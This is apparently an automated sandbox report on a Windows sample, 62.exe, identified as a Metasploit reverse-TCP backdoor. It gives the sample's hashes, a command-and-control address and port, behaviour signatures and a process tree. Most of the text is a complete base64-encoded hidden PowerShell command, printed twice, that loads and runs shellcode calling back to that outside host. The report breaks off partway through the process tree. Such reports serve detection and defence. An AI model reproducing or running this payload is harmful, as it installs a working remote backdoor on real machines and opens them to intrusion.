metasploit | a9065daea54083ef8f8496d8120fd5aafb5cd64699f0ea241b2ad96f08fb9e2c

General

Target

62.exe
Size

17KB
MD5

c057a7606fbf30b436abd1a54c120e5b
SHA1

2a265c41281f39bd682e19bf223a83b878f541ee
SHA256

a9065daea54083ef8f8496d8120fd5aafb5cd64699f0ea241b2ad96f08fb9e2c
SHA512

baaa36cff95808633402c794abc354d8018eb1492b4e71ad0e48e32685cf7d8f756fecc47c8c3bbea41a6b5ef264fb3bb00574d16777fab5df2a6604642fe402
SSDEEP

384:9EEoLO56ayzcMj+2+X+Kc9IDqwFCYgaw7hwmc39nfTlyv7yJC/:aE8O56lcV2+XCXYgaw7zctfTlyv7yJC/

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

173.212.219.45:6006

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe
2	2212	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2648	powershell.exe
2212	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 1996	2156	62.exe	29
PID 2156 wrote to memory of 1996	2156	62.exe	29
PID 2156 wrote to memory of 1996	2156	62.exe	29
PID 1996 wrote to memory of 2648	1996	cmd.exe	30
PID 1996 wrote to memory of 2648	1996	cmd.exe	30
PID 1996 wrote to memory of 2648	1996	cmd.exe	30
PID 2648 wrote to memory of 2212	2648	powershell.exe	31
PID 2648 wrote to memory of 2212	2648	powershell.exe	31
PID 2648 wrote to memory of 2212	2648	powershell.exe	31
PID 2648 wrote to memory of 2212	2648	powershell.exe	31
PID 2212 wrote to memory of 2928	2212	powershell.exe	32
PID 2212 wrote to memory of 2928	2212	powershell.exe	32
PID 2212 wrote to memory of 2928	2212	powershell.exe	32
PID 2212 wrote to memory of 2928	2212	powershell.exe	32
PID 2928 wrote to memory of 2856	2928	csc.exe	33
PID 2928 wrote to memory of 2856	2928	csc.exe	33
PID 2928 wrote to memory of 2856	2928	csc.exe	33
PID 2928 wrote to memory of 2856	2928	csc.exe	33

C:\Users\Admin\AppData\Local\Temp\62.exe
"C:\Users\Admin\AppData\Local\Temp\62.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABaAGgAMwBYACAAPQAgACcAJABHADQATQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABHADQATQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA3ACwAMAB4AGIAYgAsADAAeAAyADAALAAwAHgANgBmACwAMAB4ADIANAAsADAAeABhADUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADMALAAwAHgAMAAzACwAMAB4ADcAOAAsADAAeAA3AGMALAAwAHgAYwA2ACwAMAB4ADUAMAAsADAAeAA4ADQALAAwAHgANgBhACwAMAB4ADgAOQAsADAAeAA5AGIALAAwAHgANwA0ACwAMAB4ADYAYgAsADAAeABmADYALAAwAHgAMQAyACwAMAB4ADkAMQAsADAAeAA1AGEALAAwAHgAMgA0ACwAMAB4ADQAMAAsADAAeABkADIALAAwAHgAYwBmACwAMAB4AGYAOAAsADAAeAAwADIALAAwAHgAYgA2ACwAMAB4AGUAMwAsADAAeAA3ADMALAAwAHgANAA2ACwAMAB4ADIAMgAsADAAeAA3ADcALAAwAHgAZgAxACwAMAB4ADQAZgAsADAAeAA3AGIALAAwAHgANwA4ACwAMAB4AGYAOQAsADAAeAAzADgALAAwAHgAMwAxACwAMAB4AGEAMAAsADAAeAAzADcALAAwAHgAOAA3ACwAMAB4ADYAOQAsADAAeAA5ADAALAAwAHgANQA2ACwAMAB4ADcAYgAsADAAeAA3ADMALAAwAHgAYwA1ACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgAYgBjACwAMAB4ADEAOAAsADAAeABiADgALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADYALAAwAHgANQA1ACwAMAB4ADUAOQAsADAAeABkAGMALAAwAHgAMQAzACwAMAB4AGYAYgAsADAAeAA0AGUALAAwAHgANgA5ACwAMAB4ADYAMQAsADAAeABjADAALAAwAHgANgBmACwAMAB4AGIAZAAsADAAeABlAGQALAAwAHgANwA4ACwAMAB4ADAAOAAsADAAeABiADgALAAwAHgAMwAyACwAMAB4ADAAYwAsADAAeABhADQALAAwAHgAYwAzACwAMAB4ADYAMgAsADAAeABiAGQALAAwAHgAYgBmACwAMAB4ADgAYgAsADAAeAA5AGEALAAwAHgAYgA1ACwAMAB4ADkAOAAsADAAeAAyAGIALAAwAHgAOQBhACwAMAB4ADEAYQAsADAAeAA5AGQALAAwAHgAZQAyACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAZAA3ACwAMAB4ADcAZgAsADAAeAAyADQALAAwAHgANQAyACwAMAB4AGUANgAsADAAeABhADkALAAwAHgANwA0ACwAMAB4ADkAYgAsADAAeABkADgALAAwAHgAOQA1ACwAMAB4AGQAYgAsADAAeABhADIALAAwAHgAZAA0ACwAMAB4ADEAOAAsADAAeAAyADUALAAwAHgAZQAyACwAMAB4AGQAMwAsADAAeABjADIALAAwAHgANQAwACwAMAB4ADEAOAAsADAAeAAyADAALAAwAHgANwBmACwAMAB4ADYAMwAsADAAeABkAGIALAAwAHgANQBhACwAMAB4ADUAYgAsADAAeABlADYALAAwAHgAZgBjACwAMAB4AGYAZAAsADAAeAAyADgALAAwAHgANQAwACwAMAB4AGQAOQAsADAAeABmAGMALAAwAHgAZgBkACwAMAB4ADAANwAsADAAeABhAGEALAAwAHgAZgAzACwAMAB4ADQAYQAsADAAeAA0ADMALAAwAHgAZgA0ACwAMAB4ADEANwAsADAAeAA0AGQALAAwAHgAOAAwACwAMAB4ADgAZQAsADAAeAAyAGMALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA0ADEALAAwAHgAYQA1ACwAMAB4ADkAYwAsADAAeAAwADMALAAwAHgANAA1ACwAMAB4AGUAZAAsADAAeAA0ADcALAAwAHgAMgBkACwAMAB4AGQAYwAsADAAeAA0AGIALAAwAHgAMgA2ACwAMAB4ADUAMgAsADAAeAAzAGUALAAwAHgAMwAzACwAMAB4ADkANwAsADAAeABmADYALAAwAHgAMwA0ACwAMAB4AGQANgAsADAAeABjAGUALAAwAHgAOAA3ACwAMAB4AGIANAAsADAAeAAyADgALAAwAHgAZQBmACwAMAB4AGQANQAsADAAeAAyADIALAAwAHgAZQA0ACwAMAB4ADMAZAAsADAAeABlADYALAAwAHgAYgAyACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgAOQA1ACwAMAB4ADgAMAAsADAAeAAyAGQALAAwAHgAZQBjACwAMAB4ADMAMQAsADAAeABhADkALAAwAHgAYQA2ACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAYgA4ACwAMAB4AGEAMQAsADAAeABjAGQALAAwAHgAMQA5ACwAMAB4ADAAMgAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADkAYQAsADAAeAA3ADMALAAwAHgAZQBiACwAMAB4AGYANgAsADAAeABjAGUALAAwAHgAMgAzACwAMAB4ADgAMwAsADAAeABkAGYALAAwAHgANgBlACwAMAB4AGEAOAAsADAAeAA1ADMALAAwAHgAZQAwACwAMAB4AGIAYQAsADAAeAA0ADUALAAwAHgANQBlACwAMAB4ADcANgAsADAAeABlADgALAAwAHgANABlACwAMAB4ADgANQAsADAAeABhAGIALAAwAHgAOQBhACwAMAB4ADYAYwAsADAAeAAzAGEALAAwAHgAYQA0ACwAMAB4ADIAYwAsADAAeABmADgALAAwAHgAZABjACwAMAB4ADkAYQAsADAAeAA4ADAALAAwAHgAYQBhACwAMAB4ADcAMAAsADAAeAA1AGEALAAwAHgANwAxACwAMAB4ADAAYgAsADAAeAAyADEALAAwAHgAMwAyACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgAMQBlACwAMAB4ADIAMgAsADAAeABhADQALAAwAHgANABlACwAMAB4ADMANwAsADAAeABjADgALAAwAHgANABiACwAMAB4ADIANwAsADAAeAA2AGYALAAwAHgANgA0ACwAMAB4AGYANQAsADAAeAA2ADIALAAwAHgAZgBiACwAMAB4ADEANQAsADAAeABmAGEALAAwAHgAYgA4ACwAMAB4ADgAMQAsADAAeAAxADUALAAwAHgANwAwACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAZABiACwAMAB4ADcAMQAsADAAeAAzAGEALAAwAHgANgA1ACwAMAB4ADgAYgAsADAAeAA3ADEALAAwAHgANwAxACwAMAB4AGQANwAsADAAeAAxAGQALAAwAHgAOABkACwAMAB4AGEAZgAsADAAeAA3ADIALAAwAHgAYQAxACwAMAB4ADEAYgAsADAAeAA1ADQALAAwAHgAZAA1ACwAMAB4AGYANgAsADAAeABiADMALAAwAHgANQA2ACwAMAB4ADAAMAAsADAAeAAzADAALAAwAHgAMQBjACwAMAB4AGEAOAAsADAAeAA2ADcALAAwAHgANABiACwAMAB4ADkANQAsADAAeAAzAGMALAAwAHgAYwA4ACwAMAB4ADIAMwAsADAAeABkAGEALAAwAHgAZAAwACwAMAB4AGMAOAAsADAAeABiADMALAAwAHgAOABjACwAMAB4AGIAYQAsADAAeABjADgALAAwAHgAZABiACwAMAB4ADYAOAAsADAAeAA5AGYALAAwAHgAOQBhACwAMAB4AGYAZQAsADAAeAA3ADYALAAwAHgAMABhACwAMAB4ADgAZgAsADAAeAA1ADMALAAwAHgAZQAzACwAMAB4AGIANQAsADAAeABlADYALAAwAHgAMAAwACwAMAB4AGEANAAsADAAeABkAGQALAAwAHgAMAA0ACwAMAB4ADcAZgAsADAAeAA4ADIALAAwAHgANAAxACwAMAB4AGYANgAsADAAeABhAGEALAAwAHgAMQAyACwAMAB4AGIAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeABhAGYALAAwAHgAZgAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAB2ADUAZgBNAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB2ADUAZgBNAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAB2ADUAZgBNACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBoADMAWAApACkAOwAkAFIAcwBiACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAawBoAE0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawBoAE0AIAAkAFIAcwBiACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFIAcwBiACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JABaAGgAMwBYACAAPQAgACcAJABHADQATQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABHADQATQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA3ACwAMAB4AGIAYgAsADAAeAAyADAALAAwAHgANgBmACwAMAB4ADIANAAsADAAeABhADUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADMALAAwAHgAMAAzACwAMAB4ADcAOAAsADAAeAA3AGMALAAwAHgAYwA2ACwAMAB4ADUAMAAsADAAeAA4ADQALAAwAHgANgBhACwAMAB4ADgAOQAsADAAeAA5AGIALAAwAHgANwA0ACwAMAB4ADYAYgAsADAAeABmADYALAAwAHgAMQAyACwAMAB4ADkAMQAsADAAeAA1AGEALAAwAHgAMgA0ACwAMAB4ADQAMAAsADAAeABkADIALAAwAHgAYwBmACwAMAB4AGYAOAAsADAAeAAwADIALAAwAHgAYgA2ACwAMAB4AGUAMwAsADAAeAA3ADMALAAwAHgANAA2ACwAMAB4ADIAMgAsADAAeAA3ADcALAAwAHgAZgAxACwAMAB4ADQAZgAsADAAeAA3AGIALAAwAHgANwA4ACwAMAB4AGYAOQAsADAAeAAzADgALAAwAHgAMwAxACwAMAB4AGEAMAAsADAAeAAzADcALAAwAHgAOAA3ACwAMAB4ADYAOQAsADAAeAA5ADAALAAwAHgANQA2ACwAMAB4ADcAYgAsADAAeAA3ADMALAAwAHgAYwA1ACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgAYgBjACwAMAB4ADEAOAAsADAAeABiADgALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADYALAAwAHgANQA1ACwAMAB4ADUAOQAsADAAeABkAGMALAAwAHgAMQAzACwAMAB4AGYAYgAsADAAeAA0AGUALAAwAHgANgA5ACwAMAB4ADYAMQAsADAAeABjADAALAAwAHgANgBmACwAMAB4AGIAZAAsADAAeABlAGQALAAwAHgANwA4ACwAMAB4ADAAOAAsADAAeABiADgALAAwAHgAMwAyACwAMAB4ADAAYwAsADAAeABhADQALAAwAHgAYwAzACwAMAB4ADYAMgAsADAAeABiAGQALAAwAHgAYgBmACwAMAB4ADgAYgAsADAAeAA5AGEALAAwAHgAYgA1ACwAMAB4ADkAOAAsADAAeAAyAGIALAAwAHgAOQBhACwAMAB4ADEAYQAsADAAeAA5AGQALAAwAHgAZQAyACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAZAA3ACwAMAB4ADcAZgAsADAAeAAyADQALAAwAHgANQAyACwAMAB4AGUANgAsADAAeABhADkALAAwAHgANwA0ACwAMAB4ADkAYgAsADAAeABkADgALAAwAHgAOQA1ACwAMAB4AGQAYgAsADAAeABhADIALAAwAHgAZAA0ACwAMAB4ADEAOAAsADAAeAAyADUALAAwAHgAZQAyACwAMAB4AGQAMwAsADAAeABjADIALAAwAHgANQAwACwAMAB4ADEAOAAsADAAeAAyADAALAAwAHgANwBmACwAMAB4ADYAMwAsADAAeABkAGIALAAwAHgANQBhACwAMAB4ADUAYgAsADAAeABlADYALAAwAHgAZgBjACwAMAB4AGYAZAAsADAAeAAyADgALAAwAHgANQAwACwAMAB4AGQAOQAsADAAeABmAGMALAAwAHgAZgBkACwAMAB4ADAANwAsADAAeABhAGEALAAwAHgAZgAzACwAMAB4ADQAYQAsADAAeAA0ADMALAAwAHgAZgA0ACwAMAB4ADEANwAsADAAeAA0AGQALAAwAHgAOAAwACwAMAB4ADgAZQAsADAAeAAyAGMALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA0ADEALAAwAHgAYQA1ACwAMAB4ADkAYwAsADAAeAAwADMALAAwAHgANAA1ACwAMAB4AGUAZAAsADAAeAA0ADcALAAwAHgAMgBkACwAMAB4AGQAYwAsADAAeAA0AGIALAAwAHgAMgA2ACwAMAB4ADUAMgAsADAAeAAzAGUALAAwAHgAMwAzACwAMAB4ADkANwAsADAAeABmADYALAAwAHgAMwA0ACwAMAB4AGQANgAsADAAeABjAGUALAAwAHgAOAA3ACwAMAB4AGIANAAsADAAeAAyADgALAAwAHgAZQBmACwAMAB4AGQANQAsADAAeAAyADIALAAwAHgAZQA0ACwAMAB4ADMAZAAsADAAeABlADYALAAwAHgAYgAyACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgAOQA1ACwAMAB4ADgAMAAsADAAeAAyAGQALAAwAHgAZQBjACwAMAB4ADMAMQAsADAAeABhADkALAAwAHgAYQA2ACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAYgA4ACwAMAB4AGEAMQAsADAAeABjAGQALAAwAHgAMQA5ACwAMAB4ADAAMgAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADkAYQAsADAAeAA3ADMALAAwAHgAZQBiACwAMAB4AGYANgAsADAAeABjAGUALAAwAHgAMgAzACwAMAB4ADgAMwAsADAAeABkAGYALAAwAHgANgBlACwAMAB4AGEAOAAsADAAeAA1ADMALAAwAHgAZQAwACwAMAB4AGIAYQAsADAAeAA0ADUALAAwAHgANQBlACwAMAB4ADcANgAsADAAeABlADgALAAwAHgANABlACwAMAB4ADgANQAsADAAeABhAGIALAAwAHgAOQBhACwAMAB4ADYAYwAsADAAeAAzAGEALAAwAHgAYQA0ACwAMAB4ADIAYwAsADAAeABmADgALAAwAHgAZABjACwAMAB4ADkAYQAsADAAeAA4ADAALAAwAHgAYQBhACwAMAB4ADcAMAAsADAAeAA1AGEALAAwAHgANwAxACwAMAB4ADAAYgAsADAAeAAyADEALAAwAHgAMwAyACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgAMQBlACwAMAB4ADIAMgAsADAAeABhADQALAAwAHgANABlACwAMAB4ADMANwAsADAAeABjADgALAAwAHgANABiACwAMAB4ADIANwAsADAAeAA2AGYALAAwAHgANgA0ACwAMAB4AGYANQAsADAAeAA2ADIALAAwAHgAZgBiACwAMAB4ADEANQAsADAAeABmAGEALAAwAHgAYgA4ACwAMAB4ADgAMQAsADAAeAAxADUALAAwAHgANwAwACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAZABiACwAMAB4ADcAMQAsADAAeAAzAGEALAAwAHgANgA1ACwAMAB4ADgAYgAsADAAeAA3ADEALAAwAHgANwAxACwAMAB4AGQANwAsADAAeAAxAGQALAAwAHgAOABkACwAMAB4AGEAZgAsADAAeAA3ADIALAAwAHgAYQAxACwAMAB4ADEAYgAsADAAeAA1ADQALAAwAHgAZAA1ACwAMAB4AGYANgAsADAAeABiADMALAAwAHgANQA2ACwAMAB4ADAAMAAsADAAeAAzADAALAAwAHgAMQBjACwAMAB4AGEAOAAsADAAeAA2ADcALAAwAHgANABiACwAMAB4ADkANQAsADAAeAAzAGMALAAwAHgAYwA4ACwAMAB4ADIAMwAsADAAeABkAGEALAAwAHgAZAAwACwAMAB4AGMAOAAsADAAeABiADMALAAwAHgAOABjACwAMAB4AGIAYQAsADAAeABjADgALAAwAHgAZABiACwAMAB4ADYAOAAsADAAeAA5AGYALAAwAHgAOQBhACwAMAB4AGYAZQAsADAAeAA3ADYALAAwAHgAMABhACwAMAB4ADgAZgAsADAAeAA1ADMALAAwAHgAZQAzACwAMAB4AGIANQAsADAAeABlADYALAAwAHgAMAAwACwAMAB4AGEANAAsADAAeABkAGQALAAwAHgAMAA0ACwAMAB4ADcAZgAsADAAeAA4ADIALAAwAHgANAAxACwAMAB4AGYANgAsADAAeABhAGEALAAwAHgAMQAyACwAMAB4AGIAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeABhAGYALAAwAHgAZgAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAB2ADUAZgBNAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB2ADUAZgBNAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAB2ADUAZgBNACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBoADMAWAApACkAOwAkAFIAcwBiACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAawBoAE0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawBoAE0AIAAkAFIAcwBiACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFIAcwBiACAAJABlACIAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
